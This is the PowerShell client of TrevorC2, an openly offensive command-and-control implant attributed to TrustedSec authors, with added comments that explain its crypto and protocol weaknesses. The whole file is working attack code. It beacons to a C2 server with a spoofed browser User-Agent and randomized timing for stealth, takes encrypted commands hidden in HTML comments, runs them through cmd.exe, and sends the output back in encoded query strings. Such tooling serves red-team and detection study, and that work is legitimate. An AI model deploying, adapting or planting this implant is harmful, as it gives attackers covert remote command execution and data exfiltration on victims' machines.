#
# TrevorC2 - legitimate looking command and control
# Written by: Dave Kennedy @HackingDave
# Website: https://www.trustedsec.com
# GIT: https://github.com/trustedsec
# PowerShell Module by Alex Williams @offsec_ginger
#
# This is the client connection, and only an example. Refer to the readme
# to build your own client connection to the server C2 infrastructure.
# CONFIG CONSTANTS:
# Site used to communicate with (remote TrevorC2 site)
# Site used to communicate with (remote TrevorC2 site)
# NOTE: plain http:// — nothing in this script adds transport security; the only
# protection on the wire is the AES layer keyed from $CIPHER below.
$SITE_URL = "http://127.0.0.1"
# THIS IS WHAT PATH WE WANT TO HIT FOR CODE - YOU CAN MAKE THIS ANYTHING EXAMPLE: /index.aspx (note you need to change this as well on trevorc2_server)
# Fetched with a plain GET by the polling loop at the bottom; tasking is read out of
# the returned page body.
$ROOT_PATH_QUERY = "/"
# THIS FLAG IS WHERE THE CLIENT WILL SUBMIT VIA URL AND QUERY STRING GET PARAMETER
$SITE_PATH_QUERY = "/images"
# THIS IS THE QUERY STRING PARAMETER USED
# Keeps the trailing "=" because it is concatenated straight into the URL:
# $SITE_URL + $SITE_PATH_QUERY + "?" + $QUERY_STRING + <payload>
$QUERY_STRING = "guid="
# STUB FOR DATA - THIS IS USED TO SLIP DATA INTO THE SITE, WANT TO CHANGE THIS SO ITS NOT STATIC
# The polling loop looks for a body line containing "<!-- $STUB" and takes the text
# before " --></body>" as the ciphertext. This stub and $QUERY_STRING are fixed strings,
# i.e. stable network signatures of the default configuration.
$STUB = "oldcss="
# time_interval is the time used between randomly connecting back to server, for more stealth, increase this time a lot and randomize time periods
# Bounds in seconds handed to Get-Random by random_interval; -Maximum is exclusive,
# so the defaults give a value in 2..7.
$time_interval1 = 2
$time_interval2 = 8
# THIS IS OUR ENCRYPTION KEY - THIS NEEDS TO BE THE SAME ON BOTH SERVER AND CLIENT FOR APPROPRIATE DECRYPTION. RECOMMEND CHANGING THIS FROM THE DEFAULT KEY
# This is a passphrase, not a raw key: Create-AesKey turns it into the AES-256 key as
# SHA-256 of the UTF-8 bytes (no salt, no work factor). The key is therefore constant
# for the life of the script and shared by every copy configured with the same value.
$CIPHER = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget"
# DO NOT CHANGE BELOW THIS LINE
# Using the same key derivation from TrevorC2 https://gist.github.com/ctigeek/2a56648b923d198a6e60
# Builds a System.Security.Cryptography.AesManaged configured for AES-256 in CBC mode
# with PKCS7 padding and a 128-bit block.
# Arguments:
#   $key - optional; either a Base64 string or a byte array. If omitted, the key is
#          left for .NET to generate.
#   $IV  - optional; either a Base64 string or a byte array. If omitted, .NET generates
#          one on first use — Encrypt-String relies on this to get a fresh IV per call.
# Returns: the configured AesManaged object (emitted to the pipeline; no explicit return).
function Create-AesManagedObject($key, $IV) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
# Type is checked by name: a String is decoded from Base64, anything else is assigned
# as raw bytes. An empty/null value skips assignment entirely.
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
else {
$aesManaged.IV = $IV
}
}
if ($key) {
if ($key.getType().Name -eq "String") {
$aesManaged.Key = [System.Convert]::FromBase64String($key)
}
else {
$aesManaged.Key = $key
}
}
# Implicit return.
$aesManaged
}
# Derives the AES key from the script-scope $CIPHER passphrase:
#   Base64( SHA-256( UTF8($CIPHER) ) )
# This is a plain hash, not a password KDF (no salt, no iteration count), so the same
# passphrase always yields the same 32-byte key. Must match the server-side derivation
# (see the gist link above).
# Globals: $CIPHER (read)
# Returns: the key as a Base64 string, the form Create-AesManagedObject accepts.
function Create-AesKey() {
# NOTE: this object is created but never used — leftover from the source gist.
$aesManaged = Create-AesManagedObject
$hasher = New-Object System.Security.Cryptography.SHA256Managed
$toHash = [System.Text.Encoding]::UTF8.GetBytes($CIPHER)
$hashBytes = $hasher.ComputeHash($toHash)
$final = [System.Convert]::ToBase64String($hashBytes)
return $final
}
# Encrypts a string under $key with AES-256-CBC / PKCS7.
# Arguments:
#   $key               - Base64 key string (from Create-AesKey) or byte array
#   $unencryptedString - plaintext; encoded as UTF-8 before encryption
# Returns: Base64 of (16-byte IV || ciphertext). No IV is passed to
# Create-AesManagedObject, so the AesManaged object generates a fresh one per call.
# Confidentiality only — there is no MAC over the output. The callers in the loops
# below Base64-encode this text a second time before putting it in the query string.
function Encrypt-String($key, $unencryptedString) {
$bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
# IV is prepended so the receiver can recover it (see Decrypt-String).
$fullData = $aesManaged.IV + $encryptedData
[System.Convert]::ToBase64String($fullData)
}
# Inverse of Encrypt-String.
# Arguments:
#   $key                   - Base64 key string or byte array
#   $encryptedStringWithIV - Base64 of (16-byte IV || ciphertext)
# Returns: the UTF-8 plaintext with trailing NUL characters trimmed (PKCS7 padding is
# already removed by TransformFinalBlock; the Trim is an extra cleanup step).
# Integrity is not verified: input that was tampered with or encrypted under another
# key either decrypts to garbage or makes TransformFinalBlock throw a padding error,
# which the callers see as a MethodInvocationException.
function Decrypt-String($key, $encryptedStringWithIV) {
$bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
# First block is the IV, the remainder is ciphertext.
$IV = $bytes[0..15]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged.CreateDecryptor();
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
[System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
}
# Picks the number of seconds to wait between contacts with the server.
# Globals: $time_interval1 (inclusive lower bound), $time_interval2 (exclusive upper
#          bound — Get-Random -Maximum semantics)
# Returns: an integer in [$time_interval1, $time_interval2)
function random_interval {
Get-Random -minimum $time_interval1 -maximum $time_interval2
}
# Phase 1: initial check-in. Loops until a single GET to $SITE_URL$SITE_PATH_QUERY
# succeeds, then falls through to the tasking loop below.
while ($True) {
$time = random_interval
try {
# Check-in payload is "magic_hostname=<COMPUTERNAME>", AES-encrypted, and the resulting
# Base64 text is then Base64-encoded a second time.
$HOSTNAME = "magic_hostname=$env:computername"
$key = Create-AesKey
$SEND = Encrypt-String $key $HOSTNAME
$s = [System.Text.Encoding]::UTF8.GetBytes($SEND)
$SEND = [System.Convert]::ToBase64String($s)
# The payload is concatenated into the query string without URL-encoding, so Base64
# '+', '/' and '=' characters go out raw.
$r = [System.Net.HTTPWebRequest]::Create($SITE_URL+$SITE_PATH_QUERY+"?"+$QUERY_STRING+$SEND)
$r.Method = "GET"
$r.KeepAlive = $false
# Fixed IE11-style User-Agent; the same literal is used on every request in this file.
$r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
# Asks the server for an uncompressed body.
$r.Headers.Add("Accept-Encoding", "identity");
# A failed request (connection error, HTTP error status) throws here and is handled
# in the catch below. NOTE: $resp is never read or disposed in this loop.
$resp = $r.GetResponse()
break
}
# Only MethodInvocationException — PowerShell's wrapper around exceptions thrown by
# .NET method calls — is caught; any other exception terminates the script.
catch [System.Management.Automation.MethodInvocationException] {
Write-Host "[*] Cannot connect to '$SITE_URL'" -Foreground Red
Write-Host "[*] Trying again in $time seconds..." -Foreground Yellow
# 'sleep' is the alias for Start-Sleep.
sleep $time
# Redundant: the loop would iterate again anyway.
Continue
}
}
# Phase 2: tasking loop. Each iteration fetches $SITE_URL$ROOT_PATH_QUERY, extracts the
# ciphertext hidden in an HTML comment, decrypts it and, if it is addressed to this
# host, executes it through cmd.exe and sends the output back over the same GET
# channel used for the check-in. Runs forever; nothing in this loop breaks out of it.
while ($True) {
$time = random_interval
try {
$r = [System.Net.HTTPWebRequest]::Create($SITE_URL + $ROOT_PATH_QUERY)
$r.Method = "GET"
$r.KeepAlive = $false
$r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
$r.Headers.Add("Accept-Encoding", "identity");
# NOTE: neither $resp nor $sr is closed/disposed anywhere in this loop.
$resp = $r.GetResponse()
$reqstream = $resp.GetResponseStream()
$sr = New-Object System.IO.StreamReader $reqstream
# Read the whole body, split it into lines and keep the line(s) containing "<!-- $STUB"
# (Select-String yields MatchInfo objects; the -split below works on their string form).
$ENCRYPTEDSTREAM = $sr.ReadToEnd() -split("`n") | Select-String "<!-- $STUB"
# Text between "<!-- $STUB" and " --></body>" is the Base64(IV || ciphertext) blob.
$ENCRYPTED = $ENCRYPTEDSTREAM -split("<!-- $STUB")
$ENCRYPTED = $ENCRYPTED[1] -split(" --></body>")
# Re-derived every poll; Create-AesKey is a pure function of $CIPHER, so this is the
# same key each time.
$key = Create-AesKey
$DECRYPTED = Decrypt-String $key $ENCRYPTED[0]
# "nothing" is the server's idle marker.
if ($DECRYPTED -eq "nothing"){
sleep $time
}
else{
# Tasking format: "<COMPUTERNAME>::::<command>". Only text prefixed with this host's
# name is acted on. NOTE: there is no sleep on the mismatch path, so the next poll
# happens immediately. There is also no MAC on the ciphertext — whatever decrypts
# cleanly under the shared key is trusted as a command.
if ($DECRYPTED -like $env:computername + "*"){
# -split leaves an empty first element; the whole array is handed to cmd.exe.
$DECRYPTED = $DECRYPTED -split($env:computername + "::::")
# Executes the server-supplied text via cmd /Q /c, capturing stdout and stderr as one
# string.
$RUN = (cmd /Q /c $DECRYPTED 2>&1 ) | Out-String
$RUN = ($env:computername + "::::" + $RUN)
# Output goes back exactly like the check-in: encrypt, Base64 twice, GET query string
# (again without URL-encoding).
$SEND = Encrypt-String $key $RUN
$s = [System.Text.Encoding]::UTF8.GetBytes($SEND)
$SEND = [System.Convert]::ToBase64String($s)
$r = [System.Net.HTTPWebRequest]::Create($SITE_URL+$SITE_PATH_QUERY+"?"+$QUERY_STRING+$SEND)
$r.Method = "GET"
$r.KeepAlive = $false
$r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
$r.Headers.Add("Accept-Encoding", "identity");
$resp = $r.GetResponse()
sleep $time
}
}
}
# Catches connection failures and also decrypt/padding errors from Decrypt-String, since
# both surface as MethodInvocationException; the message printed is the same for either.
catch [System.Management.Automation.MethodInvocationException] {
Write-Host "[*] Cannot connect to '$SITE_URL'" -Foreground Red
Write-Host "[*] Trying again in $time seconds..." -Foreground Yellow
sleep $time
# Redundant: the loop would iterate again anyway.
Continue
}
}